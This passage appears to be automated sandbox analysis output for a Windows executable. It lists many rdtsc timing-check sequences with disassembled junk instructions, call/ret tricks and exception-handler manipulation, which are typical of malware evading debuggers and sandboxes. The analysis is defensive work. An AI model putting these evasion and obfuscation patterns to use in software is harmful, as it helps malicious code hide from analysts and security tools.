                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10795C0 second address: 107964C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0D4776372h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a nop 0x0000000b add dword ptr [ebp+122D2673h], edx 0x00000011 push dword ptr fs:[00000000h] 0x00000018 jno 00007FB0D4776367h 0x0000001e mov dword ptr fs:[00000000h], esp 0x00000025 mov edi, dword ptr [ebp+1248424Ch] 0x0000002b mov eax, dword ptr [ebp+122D1529h] 0x00000031 push 00000000h 0x00000033 push ebp 0x00000034 call 00007FB0D4776368h 0x00000039 pop ebp 0x0000003a mov dword ptr [esp+04h], ebp 0x0000003e add dword ptr [esp+04h], 0000001Ch 0x00000046 inc ebp 0x00000047 push ebp 0x00000048 ret 0x00000049 pop ebp 0x0000004a ret 0x0000004b jg 00007FB0D4776374h 0x00000051 push FFFFFFFFh 0x00000053 mov bh, 49h 0x00000055 push eax 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007FB0D477636Eh 0x0000005d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107A44E second address: 107A45B instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB0D54BC066h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107964C second address: 1079656 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB0D477636Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107A45B second address: 107A461 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107A461 second address: 107A4AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 jg 00007FB0D4776367h 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007FB0D4776368h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 00000016h 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 movzx edi, cx 0x0000002c push 00000000h 0x0000002e mov edi, esi 0x00000030 pushad 0x00000031 movzx edi, cx 0x00000034 mov dword ptr [ebp+122D1B75h], edx 0x0000003a popad 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e js 00007FB0D4776368h 0x00000044 pushad 0x00000045 popad 0x00000046 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107B497 second address: 107B49B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107A5FA second address: 107A66F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov bx, DE8Ah 0x0000000f push dword ptr fs:[00000000h] 0x00000016 push 00000000h 0x00000018 push ebx 0x00000019 call 00007FB0D4776368h 0x0000001e pop ebx 0x0000001f mov dword ptr [esp+04h], ebx 0x00000023 add dword ptr [esp+04h], 00000018h 0x0000002b inc ebx 0x0000002c push ebx 0x0000002d ret 0x0000002e pop ebx 0x0000002f ret 0x00000030 mov dword ptr fs:[00000000h], esp 0x00000037 stc 0x00000038 mov eax, dword ptr [ebp+122D001Dh] 0x0000003e or ebx, dword ptr [ebp+1246E7EBh] 0x00000044 push FFFFFFFFh 0x00000046 push 00000000h 0x00000048 push edi 0x00000049 call 00007FB0D4776368h 0x0000004e pop edi 0x0000004f mov dword ptr [esp+04h], edi 0x00000053 add dword ptr [esp+04h], 00000014h 0x0000005b inc edi 0x0000005c push edi 0x0000005d ret 0x0000005e pop edi 0x0000005f ret 0x00000060 jnc 00007FB0D4776367h 0x00000066 push eax 0x00000067 pushad 0x00000068 push eax 0x00000069 push edx 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107B49B second address: 107B4A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107A66F second address: 107A673 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107B4A5 second address: 107B4A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107A673 second address: 107A677 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107B4A9 second address: 107B547 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a add edi, dword ptr [ebp+122D2CA6h] 0x00000010 js 00007FB0D54BC072h 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push ecx 0x0000001b call 00007FB0D54BC068h 0x00000020 pop ecx 0x00000021 mov dword ptr [esp+04h], ecx 0x00000025 add dword ptr [esp+04h], 0000001Ah 0x0000002d inc ecx 0x0000002e push ecx 0x0000002f ret 0x00000030 pop ecx 0x00000031 ret 0x00000032 push 00000000h 0x00000034 mov ebx, ecx 0x00000036 mov dword ptr [ebp+122D18D0h], eax 0x0000003c xchg eax, esi 0x0000003d pushad 0x0000003e jno 00007FB0D54BC07Ah 0x00000044 pushad 0x00000045 jmp 00007FB0D54BC070h 0x0000004a jmp 00007FB0D54BC079h 0x0000004f popad 0x00000050 popad 0x00000051 push eax 0x00000052 push ebx 0x00000053 push eax 0x00000054 push edx 0x00000055 pushad 0x00000056 popad 0x00000057 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107B6DE second address: 107B6E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107B6E2 second address: 107B6EC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107B6EC second address: 107B6F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108062C second address: 1080644 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FB0D54BC066h 0x00000008 jmp 00007FB0D54BC06Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1080644 second address: 108064E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FB0D4776366h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108064E second address: 1080657 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1025FD6 second address: 1025FF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB0D4776376h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1025FF0 second address: 1025FFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0D54BC06Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1083330 second address: 108333A instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB0D4776366h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108333A second address: 108338A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007FB0D54BC066h 0x00000009 jmp 00007FB0D54BC073h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 jmp 00007FB0D54BC074h 0x0000001a jmp 00007FB0D54BC078h 0x0000001f popad 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108545F second address: 1085477 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0D4776370h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10824AD second address: 1082555 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB0D54BC06Eh 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 call 00007FB0D54BC068h 0x00000018 pop edi 0x00000019 mov dword ptr [esp+04h], edi 0x0000001d add dword ptr [esp+04h], 0000001Bh 0x00000025 inc edi 0x00000026 push edi 0x00000027 ret 0x00000028 pop edi 0x00000029 ret 0x0000002a mov di, cx 0x0000002d push dword ptr fs:[00000000h] 0x00000034 push 00000000h 0x00000036 push ecx 0x00000037 call 00007FB0D54BC068h 0x0000003c pop ecx 0x0000003d mov dword ptr [esp+04h], ecx 0x00000041 add dword ptr [esp+04h], 00000016h 0x00000049 inc ecx 0x0000004a push ecx 0x0000004b ret 0x0000004c pop ecx 0x0000004d ret 0x0000004e mov edi, dword ptr [ebp+122D2CC6h] 0x00000054 mov dword ptr fs:[00000000h], esp 0x0000005b jmp 00007FB0D54BC077h 0x00000060 add bh, 0000000Ch 0x00000063 mov eax, dword ptr [ebp+122D0DE9h] 0x00000069 jnl 00007FB0D54BC06Ah 0x0000006f mov bx, 29A4h 0x00000073 cmc 0x00000074 push FFFFFFFFh 0x00000076 mov di, FF92h 0x0000007a nop 0x0000007b push edx 0x0000007c push eax 0x0000007d push edx 0x0000007e pushad 0x0000007f popad 0x00000080 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1083512 second address: 108351B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107E6C5 second address: 107E6CF instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB0D54BC066h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1084559 second address: 108455D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1086468 second address: 10864EE instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB0D54BC066h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FB0D54BC079h 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007FB0D54BC068h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 0000001Ch 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d push 00000000h 0x0000002f jo 00007FB0D54BC06Ch 0x00000035 mov dword ptr [ebp+122D3073h], edx 0x0000003b push 00000000h 0x0000003d mov edi, dword ptr [ebp+122D1C8Ah] 0x00000043 xchg eax, esi 0x00000044 push edi 0x00000045 jmp 00007FB0D54BC077h 0x0000004a pop edi 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e je 00007FB0D54BC068h 0x00000054 pushad 0x00000055 popad 0x00000056 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10856C7 second address: 10856CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10856CC second address: 10856DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10856DB second address: 10856DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108668F second address: 1086693 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1086693 second address: 10866A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jns 00007FB0D4776366h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10875BB second address: 10875BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1088594 second address: 1088598 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1088598 second address: 10885B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007FB0D54BC071h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10885B6 second address: 10885BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1088784 second address: 108878E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FB0D54BC066h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1091DE2 second address: 1091DF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0D4776370h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1095964 second address: 109596B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109596B second address: 1095970 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1098E0C second address: 1098E36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 pushad 0x00000008 push ecx 0x00000009 jbe 00007FB0D54BC066h 0x0000000f pop ecx 0x00000010 jmp 00007FB0D54BC06Dh 0x00000015 popad 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d push esi 0x0000001e pop esi 0x0000001f pushad 0x00000020 popad 0x00000021 popad 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1098E36 second address: 1098E4D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB0D4776368h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jnc 00007FB0D4776366h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1098E4D second address: 1098E51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1098E51 second address: 1098E5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1098E5C second address: 1098E6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1098E6B second address: 1098E6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109A53A second address: 109A560 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FB0D54BC079h 0x0000000c js 00007FB0D54BC066h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109A560 second address: 109A56A instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB0D4776366h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109A56A second address: 109A56F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109BBE7 second address: 109BBEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109BBEC second address: 109BBF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109BBF2 second address: 109BBF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109BBF6 second address: 109BC02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109BC02 second address: 109BC08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109BC08 second address: 109BC0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A12D0 second address: 10A12E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0D4776374h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A1D14 second address: 10A1D1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A1E4E second address: 10A1E65 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB0D4776366h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f jno 00007FB0D4776366h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A1FDD second address: 10A1FE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A1FE3 second address: 10A1FEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A2432 second address: 10A2438 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AA296 second address: 10AA29C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AA29C second address: 10AA2A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AA2A2 second address: 10AA2B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c pop eax 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A94E1 second address: 10A94EB instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB0D54BC066h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A94EB second address: 10A94F0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A94F0 second address: 10A94F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A9628 second address: 10A9630 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A9630 second address: 10A9635 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A9A33 second address: 10A9A37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A9BFE second address: 10A9C02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B3D45 second address: 10B3D4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B3D4B second address: 10B3D61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jp 00007FB0D54BC066h 0x0000000d pop edi 0x0000000e jng 00007FB0D54BC06Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B2ABC second address: 10B2AC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B2AC1 second address: 10B2AD5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0D54BC06Fh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B2C23 second address: 10B2C2A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B3445 second address: 10B344B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B344B second address: 10B3455 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB0D4776366h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B3455 second address: 10B345F instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB0D54BC06Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B345F second address: 10B347D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007FB0D4776377h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B35EE second address: 10B360D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0D54BC077h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B360D second address: 10B3617 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B3617 second address: 10B3628 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB0D54BC06Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BBB26 second address: 10BBB42 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FB0D4776372h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BBB42 second address: 10BBB46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BBB46 second address: 10BBB4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
